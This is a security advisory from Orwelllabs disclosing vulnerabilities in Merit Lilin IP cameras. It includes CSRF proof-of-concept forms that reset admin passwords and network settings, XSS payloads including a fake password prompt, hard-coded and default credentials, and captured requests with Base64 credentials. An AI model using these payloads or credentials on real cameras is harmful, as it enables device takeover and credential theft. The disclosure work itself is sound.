1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389 | _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
www.orwelllabs.com
securityadivisory
@orwelllabs
;)(r
By sitting in the alcove, and keeping well back,
Winston was able to remain outside the range of the telescreen...
* Adivisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(+) Title: Merit Lilin IP Cameras Multiple Vulnerabilities
(+) Vendor: Merit Lilin Enterprise Co., Ltd.
(+) Research and Advisory: Orwelllabs
(+) Adivisory URL:
http://www.orwelllabs.com/2016/04/merit-lilin-ip-cameras-multiple_27.html
(+) OLSA-ID: OLSA-2016-04-28
(+) Affected Versions: L series products with firmware 1.4.36/1.2.02, OS
Version: Linux 2.6.38/Linux 2.6.32
(+) IoT Attack Surface: Device Administrative
Interface/Authentication/Authorization
(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Adivisory Overview
--+---------------------------------------------+------+--------------------------------------------
id| Vulnerability Title | Rank | Attack Surface
--+---------------------------------------------+------+--------------------------------------------
1 | Multiple Cross-site Request Forgery | I1 | Insecure Web Interfaces
2 | Multiple Cross-site Scripting/HTML Injection| I1 | Insecure Web
Interfaces
3 | Hard-coded credentials | I1 | Insecure Web Interfaces
4 | Cleartext sensitive data | I1 | Insecure Web Interfaces
5 | Weak Passwords/Known credentials | I1 | Insecure Web Interfaces
6 | Account lockout | I1 | Insecure Web Interfaces
7 | Poorly Protected Credentials | I2 | Insufficient
Authentication/Authorization
--+---------------------------------------------+------+--------------------------------------------
Vendor Background
=================
LILIN, is a global IP video manufacturer of IP video cameras, recording
devices, and software with over 30 years of experience.
1. Multiple Cross-site Request Forgery
======================================
Merit LILIN IP Cameras are prone to multiple cross-site request forgery
vulnerabilities.
(+) Technical Details and PoCs:
-------------------------------
# Basic >> System >> User
> Changing 'admin' password to 'w!nst0nSm!th'
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/apply2.cgi?action=useredit&user_seq=1&user_account=admin&user_password=w!nst0nSm!th&user_priority=254&user_group=0
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# Basic >> Network >> DDNS
> change DDNS information (user/hostname/password)
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/apply.cgi?action=ddns_apply&next_page=ddns.asp&ddns_type=0&ddns_flag=1&ddns_account=Winston&ddns_pwd=pass&ddns_hostname=smithwmachine&ddns_new_pwd=&ddns_wanip=
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# SNMP
> change community/user/pass/pripass/v3rouser/etc.
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/snmp?snmpenable=0&v12rwcommunity=public&v12rocommunity=private&v3user=admin&v3authpass=password&v3pripass=w!nst0nSm!th&v3rwuser=public&v3rouser=private
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# Basic >> Network >> SIP
> change sip_domain_server/sipreg_username/sipreg_password/sip_port=/etc.
<html>
<!-- Orwelllabs - Merit Lilin IP Camera - CSRF PoC -->
<body>
<form action="
http://xxx.xxx.xxx.xxx/apply.cgi?action=sip_apply&next_page=sip.asp&voip_flag=1&sip_domain_server=lilintw.ddnsipcam.com&sipreg_username=admin&sipreg_password=pass&sipreg_expires=0&sip_port=5060&audiortp_port=7078&videortp_port=9078
">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
2. Multiple Cross-site Scripting/HTML Injection
====================-==========================
Merit Lilin IP Cameras are prone to multiple cross-site scripting
vulnerabilities.
Technical Details and PoCs:
---------------------------
[SAMBA] Advance >> System >> SAMBA Service
------------------------------------------
%- Script: apply.cgi
%- affected parameters:
(+) action
(+) SambaRecordState
(+) SAMBA_OSD
(+) SAMBARecordOption2
(+) SAMBARecordFormat
(+) SAMBAPreRecordTime
(+) SAMBAServer
(+) SAMBAServerPort
(+) SAMBAServerAccount
(+) SAMBAServerPassword
(+) SAMBAServerDirectory
%- [ *** XSS *** ] Payload(1) used:
123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
%- URL: http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS ***
]&SambaRecordState=[ *** XSS *** ]&SAMBA_OSD=[ *** XSS ***
]&SAMBARecordOption2=[ *** XSS *** ]&SAMBARecordFormat=[ *** XSS ***
]&SAMBAPreRecordTime=[ *** XSS *** ]&SAMBAServer=[ *** XSS ***
]&SAMBAServerPort=[ *** XSS *** ]&SAMBAServerAccount=[ *** XSS ***
]&SAMBAServerPassword=[ *** XSS *** ]&SAMBAServerDirectory=[ *** XSS *** ]
[General] -> Basic >> System >> General
---------------------------------------
- Affected script: apply.cgi
- affected parameters:
(+) action
(+) next_page
(+) SAMBAServerDirectory
%- [ *** XSS *** ] Payload(2) used:
%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
%- URL http://xxx.xxx.xxx.xxx/apply.cgi?action=[ *** XSS *** ]&next_page=[
*** XSS ***
]&CAM_NAME=LR6122&ACTIVEX_OSD_NAME=LR6122&CAM_OSD=0&TIMER_OSD=0&ACTIVEX_OSD_ENABLE=0&ACTIVEX_MODE=0
[HTTP POST Service] -> Advance >> Event >> HTTP POST Service
------------------------------------------------------------
- Affected script: apply.cgi
- affected parameters:
(+) AM_HTTP_JPEG
(+) next_page*-*
(+) HTTPPostPort*-*
%- [ *** XSS *** ] Payload used:
123%3Cimg%20src=%22x%20%22%20onerror=prompt%28%22Lilin_Password:%22%29%20/%3E
*-* Payload(2)
%- URL:
http://xxx.xxx.xxx.xxx/apply.cgi?action=httppost_apply&next_page=httppost.asp&HTTPServer=192.168.0.2&HTTPPostPort=56082&HTTPAccount=LILIN&HTTPPassword=control4&AM_HTTP_JPEG=[
*** XSS *** ]
3. Hard-coded credentials
=========================
This application stores hard-coded credentials in html code.
Technical Details and PoCs:
---------------------------
(+) GET -> http://xxx.xxx.xxx.xxx/new/index.htm
HTML Source code:
<script>
var g_ScreenMode = GetCookie('ScreenMode');
if(g_ScreenMode==null || g_ScreenMode=='' || g_ScreenMode==' ')
{
g_ScreenMode = 1;
SetCookie('ScreenMode', 1);
}
var g_AD_OSD_FLAG = GV('0','0');
//Profileno,Width,Height,Type,ScreenSwitch,Resolution,Cmd
var g_CtrlInfo = new Ctrl_ProfileInfo('',0,0,'',g_ScreenMode,'','');
var g_AD_RATE = Number('0');
var g_video_port = Number('0');
var g_spook_port = Number('554');
var g_httpd_auth_account = 'admin'; <<<<<---- user
var g_httpd_auth_passwd = 'pass'; <<<<<---- pass
var g_encode_mode = Number('0');
var g_profile00_fps_dwell = 1000/Number('15');
var g_profile01_fps_dwell = 1000/Number('5');
var g_profile02_fps_dwell = 1000/Number('25');
var g_profile03_fps_dwell = 1000/Number('0');
var g_ACTIVEX_OSD_ENABLE = Number('0');
var g_title_name = 'LR6122';
var g_CAM_OSD = Number('0');
var g_TIMER_OSD = Number('0');
[... Snip ...]
(+) GET -> http://xxx.xxx.xxx.xxx/new/no_sd_file.htm
HTML source code:
[... Snip ...]
//http://192.168.3.162/sdlist?dirlist=0
//http://192.168.3.225/sdlist?filelist=2012081001
//var g_AllDir =
"2012080901,2012080902,2012080903,2012080904,2012080905,2012080906:2012081001,2012081002:2012081101,2012081111";
//var g_AllFiles =
"20120809010124.avi,20120809010234.avi,20120809010334.avi,20120809010434.avi,20120809010534.avi,20120809010643.avi";
var g_httpd_auth_account = GV('admin','admin'); <<<<<---- here
var g_httpd_auth_passwd = GV('pass','pass'); <<<<<---- here
[... Snip ...]
4. Cleartext sensitive data
===========================
Everything is trasmite over HTTP, including credentials,
like this, when an administrador "submmit" the Samba configuration form
(cleartext everywhere).
Technical Details and PoCs:
---------------------------
GET
/apply.cgi?action=sambarec_apply&SambaRecordState=0&SAMBA_OSD=0&SAMBARecordOption2=0&SAMBARecordFormat=0&SAMBAPreRecordTime=5&SAMBAServer=192.168.0.100&SAMBAServerPort=5000&SAMBAServerAccount=admin&SAMBAServerPassword=pass&SAMBAServerDirectory=/Public
HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46cGFzcw==
Connection: keep-alive
5. Weak Default Credentials/Known credentials
=============================================
The vast maiority of these devices remain with default credential
admin:pass (cameras)/admin:1111 (NVR) and costumers are not obligated to
change it during initial setup. The best
6. Account Lockout
==================
There is no control to prevent brute force attacks and to lockout an
account after X failed login attempts.
I1.Impact
---------
Insecure web interfaces can result in data loss or corruption, lack of
accountability, or denial of access and can lead to complete device
takeover.
7. Poorly Protected Credentials
===============================
An attacker in the same network is able to capture and decode the
credentials as they aren't trasmited over HTTPs and are protected using
just Base64 encoding.
Technical Details and PoCs:
---------------------------
> GET Request of) Authentication Process
GET /new/setup.htm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: O|orwell/labs,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/new/setup.htm
Cookie: lang=0; ScreenMode=O-Orw3lll@bs; profileno=0; uimode=1
Connection: keep-alive
Authorization: Basic YWRtaW46cGFzcw==
Affected products
=================
L series with firmware 1.4.36/1.2.02, OS Version: Linux 2.6.38/Linux 2.6.32.
LB1022X
LR7224X
LR7228X
LR7424X
LR7428X
LR7722X
LR7022
LR7922
LR6122X
LR6022X
LR2322X
LR2122
LR312
LR832
LR2522
LD6122X
LD2322X
LD2122
LD2222
*Once this is related with a old bad design its probably that a large range
of products are affected by reported issues.
Timeline
++++++++
2016-03-23: First attemp to contact Vendor
2016-04-22: Request #13617 "Lilin Products Vulnerabilities" created
2016-04-23: Attemp to contact vendor
2016-04-25: Vendor response (ask for details)
2016-04-27: According to the Vendor these issues are already know and will
be remediated in the future.
2016-04-28: Full disclosure
About Orwelllabs
++++++++++++++++
Orwelllabs is an independent security research lab interested in IoT, what
means embedded devices and all its components like web applications, network,
mobile applications and all surface areas prone to attack. Orwelllabs aims
to study, learn and produce some intelligence around this vast and
confusing big picture called smart cities. We have special appreciation for
devices designed to provide security to these highly technological cities,
also known as Iost (Internet of Things Security).
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----
|
